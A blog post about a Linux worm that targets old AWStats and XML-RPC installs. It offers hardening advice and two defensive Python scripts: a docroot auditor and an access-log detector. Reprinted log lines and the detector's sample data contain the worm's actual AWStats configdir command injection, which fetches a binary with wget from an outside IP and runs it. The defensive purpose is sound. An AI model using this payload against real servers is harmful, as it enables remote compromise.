Linux worm on the loose

There is a worm on the loose which attacks Linux webservers running old versions of programs like WordPress, AWStats, etc. More information about this worm can be found:

So, there it is: Linux can be attacked by worms just as easily as Windows systems? Well, yes and no. If you don’t manage your system properly it probably is insecure and vulnerable to worms and hackers; but if you keep your software up to date, run at least a host-based firewall (iptables) and secure your Apache webserver with mod_security, both OSes can be pretty safe.
There are, however, a few things in favor of Linux.

It’s open source, so anyone can look at the code and check whether there are any backdoors or buffer overflows. This happens a lot, and these bugs are found and published (for instance on Bugtraq). As a rule the open source folks take this very seriously (even personally) and a patch is available in no time.

With closed source you depend on the vendor to keep your software safe. Security leaks are found either by reverse engineering the code or by firing massive amounts of pseudo-random data at the server. When the server crashes with certain error codes, you have found a bug which might be exploitable. Security researchers find these kinds of holes all the time, and it can take up to half a year or more before a vendor releases a patch to close the hole. And since hackers can be thought of as a kind of security researcher…

Linux people tend to know more about their system. With Windows a lot of “administrators” never fire up a DOS box and have a look at netstat -an to see the network connections which are active on their box. On Linux you always use a shell, and netstat -tupan | grep LISTEN not only shows you the ports you are willing to receive connections on, but also the process attached to each port.
Also, Microsoft tends to hide a lot of information from its users. On one hand this makes the system very easy to install and use, but on the other hand it makes it very difficult to fine-tune the system into a lean and mean webserver, for instance. Removing unnecessary software means increasing security, increasing performance, reducing maintenance time, etcetera. With Linux you can strip the software down to the bone. A neat example of this is Tom’s root and boot disk, which runs multiuser, network-enabled Linux from one bootable floppy!

Anyway, back to the worm. Want to know if your computer is vulnerable? Some quick and easy things to do are: run a locate xmlrpc.php and a locate awstats. If you run AWStats, upgrade to the latest version and rename your URLs so they don’t start with awstats but with something like my-stats. This will make it nearly impossible for worms to exploit future security holes. Also have a .htaccess in your awstats directory so you need a username and password to access the statistics. Test your access and watch your webserver logs while you are testing.

Install and use mod_security on your Apache webserver. Play around with rules.conf so you see what gets blocked and what is allowed. Use Google to find good examples of other people’s rules.conf (sometimes called mod_security.conf).

Block admin access to your blog or CMS so it is only reachable from defined IP addresses.
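As an added example (mine, not part of the original post), here is a small Python audit script that does the locate-and-check step above for you: it walks a web document root instead of relying on the locate database, lists every awstats.pl and xmlrpc.php it finds, and reports whether the directory holding each one has a .htaccess that actually demands a login. The document root layout, the file contents and the my-stats path are constructed assumptions for the demonstration.

```python
"""Audit a web document root for awstats.pl / xmlrpc.php and .htaccess auth.

Added example; not from the original post. Walks a directory tree
(instead of running `locate`, which needs an up-to-date locate database),
lists every awstats.pl and xmlrpc.php it finds, and reports whether the
directory holding the file is protected by a .htaccess that requires a
login. The docroot layout built below is constructed for the demo.
"""
import os
import re
import tempfile

TARGET_NAMES = {"awstats.pl", "xmlrpc.php"}
# A .htaccess counts as protecting its directory only when it both
# enables an auth scheme and requires a (valid) user.
AUTH_TYPE_RE = re.compile(r"^\s*AuthType\s+\S+", re.IGNORECASE | re.MULTILINE)
REQUIRE_RE = re.compile(r"^\s*Require\s+(valid-user|user\s+\S+)",
                        re.IGNORECASE | re.MULTILINE)


def htaccess_requires_auth(directory):
    """True if directory/.htaccess enables HTTP authentication, else False."""
    path = os.path.join(directory, ".htaccess")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:          # no .htaccess (or unreadable): not protected
        return False
    return bool(AUTH_TYPE_RE.search(text) and REQUIRE_RE.search(text))


def audit_docroot(docroot):
    """Find awstats.pl / xmlrpc.php under docroot.

    Returns a list of dicts {"path", "name", "protected"}, sorted by path,
    where "protected" says whether the containing directory's .htaccess
    requires a login.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        for name in filenames:
            if name in TARGET_NAMES:
                findings.append({
                    "path": os.path.relpath(os.path.join(dirpath, name), docroot),
                    "name": name,
                    "protected": htaccess_requires_auth(dirpath),
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_docroot():
    """Constructed docroot: one protected awstats dir, one bare xmlrpc.php."""
    root = tempfile.mkdtemp(prefix="docroot-")
    stats = os.path.join(root, "cgi-bin", "my-stats")   # renamed, as advised
    os.makedirs(stats)
    with open(os.path.join(stats, "awstats.pl"), "w") as fh:
        fh.write("#!/usr/bin/perl\n")
    with open(os.path.join(stats, ".htaccess"), "w") as fh:
        fh.write('AuthType Basic\nAuthName "stats"\n'
                 'AuthUserFile /etc/apache2/.htpasswd\nRequire valid-user\n')
    blog = os.path.join(root, "blog")
    os.makedirs(blog)
    with open(os.path.join(blog, "xmlrpc.php"), "w") as fh:
        fh.write("<?php\n")
    return root


if __name__ == "__main__":
    for finding in audit_docroot(build_sample_docroot()):
        status = "protected" if finding["protected"] else "NOT protected"
        print(f"{finding['path']}: {finding['name']} ({status})")
```

A .htaccess only takes effect when the Apache configuration allows it for that directory (AllowOverride AuthConfig), so treat "protected" here as a necessary check rather than proof; confirm it the way the post suggests, by fetching the URL without credentials and watching for the 401 in your webserver logs.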

There are a number of other measures, but I will address those at a later time.
By the way, here is some Apache logging of a worm trying to get in:

24.174.32.12 - - "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296
24.174.32.12 - - "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296
24.174.32.12 - - "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 304
24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288
24.174.32.12 - - "POST /blog/xmlrpc.php HTTP/1.1" 404 293
24.174.32.12 - - "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
24.174.32.12 - - "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301
24.174.32.12 - - "POST /drupal/xmlrpc.php HTTP/1.1" 404 295
24.174.32.12 - - "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301
24.174.32.12 - - "POST /wordpress/xmlrpc.php HTTP/1.1" 404 298
24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288
24.174.32.12 - - "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295
24.174.32.12 - - "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295

You see every log line with a response code of 404; that is a good sign. It means the webserver responds with “page not found”. And those percent-encoded characters are the means to get in: that’s what to use when specifying a mod_security rule to block all those kinds of attempts proactively. Have a look at:
http://www.gotroot.com/downloads/ftp/mod_security/rules.conf
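To make the point about those percent-encoded characters concrete, here is an added example (mine, not from the post) in Python: a detector that parses access-log lines of the shape shown above, percent-decodes the request and flags the two probe patterns the worm uses, an awstats.pl configdir parameter carrying shell metacharacters or download-and-run commands, and POSTs to any xmlrpc.php. The sample input embeds the log lines from the post plus two constructed benign lines from 192.0.2.10 (a documentation address) to show that ordinary traffic, including a normal AWStats page view, is not flagged; the rule names are this example's own.

```python
"""Flag the worm's probe patterns in Apache access-log lines.

Added example, not from the original post. Handles lines of the form
  IP - - "METHOD TARGET HTTP/x.y" STATUS BYTES
(timestamp omitted, as in the post). Rule names are this example's own.
"""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# The worm's awstats request has no space before "HTTP/1.1", so the space
# between target and protocol is optional in this pattern.
LINE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) ?HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)
CONFIGDIR_RE = re.compile(r'(?:^|&)configdir=([^&]*)')
SHELL_META_RE = re.compile(r'[|;`]|\$\(')                 # pipes, separators, subshells
DOWNLOAD_EXEC_RE = re.compile(r'\b(wget|curl|chmod)\b')  # fetch-and-run tooling


def parse_line(line):
    """Split one access-log line into fields; None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["decoded"] = unquote(entry["target"])   # undo %2e %3b %2f ... encoding
    return entry


def classify(entry):
    """Return the rule names the decoded request matches (empty if clean)."""
    hits = []
    parts = urlsplit(entry["decoded"])
    path = parts.path.lower()
    if path.endswith("awstats.pl"):
        m = CONFIGDIR_RE.search(parts.query)
        if m and (SHELL_META_RE.search(m.group(1)) or DOWNLOAD_EXEC_RE.search(m.group(1))):
            hits.append("awstats_configdir_injection")
    if entry["method"] == "POST" and path.endswith("xmlrpc.php"):
        hits.append("xmlrpc_probe")
    return hits


def scan(lines):
    """Aggregate per source IP: lines seen, 404 responses, and rule hit counts."""
    report = defaultdict(lambda: {"lines": 0, "not_found": 0, "hits": defaultdict(int)})
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        rec = report[entry["ip"]]
        rec["lines"] += 1
        if entry["status"] == 404:
            rec["not_found"] += 1
        for rule in classify(entry):
            rec["hits"][rule] += 1
    return {ip: {"lines": r["lines"], "not_found": r["not_found"], "hits": dict(r["hits"])}
            for ip, r in report.items()}


def suspicious_ips(report):
    """Source IPs that triggered at least one rule, sorted."""
    return sorted(ip for ip, r in report.items() if r["hits"])


# Sample input: the 13 lines from the post, plus two constructed benign lines
# from 192.0.2.10 (a documentation address) as a control.
SAMPLE_LINES = [
    '24.174.32.12 - - "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296',
    '24.174.32.12 - - "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 296',
    '24.174.32.12 - - "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|HTTP/1.1" 404 304',
    '24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288',
    '24.174.32.12 - - "POST /blog/xmlrpc.php HTTP/1.1" 404 293',
    '24.174.32.12 - - "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300',
    '24.174.32.12 - - "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301',
    '24.174.32.12 - - "POST /drupal/xmlrpc.php HTTP/1.1" 404 295',
    '24.174.32.12 - - "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301',
    '24.174.32.12 - - "POST /wordpress/xmlrpc.php HTTP/1.1" 404 298',
    '24.174.32.12 - - "POST /xmlrpc.php HTTP/1.1" 404 288',
    '24.174.32.12 - - "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295',
    '24.174.32.12 - - "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295',
    '192.0.2.10 - - "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.10 - - "GET /cgi-bin/my-stats/awstats.pl?config=example.org HTTP/1.1" 200 8412',
]

if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LINES).items():
        print(ip, rec)
```

The decode-then-inspect order is the important part: the raw line never contains the string "wget", only its percent-encoded form, so a rule matched against the undecoded request misses it. The same holds for mod_security rules, which is why the gotroot rules.conf inspects decoded arguments rather than the raw URI.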

Author: Ewald

The grey haired professor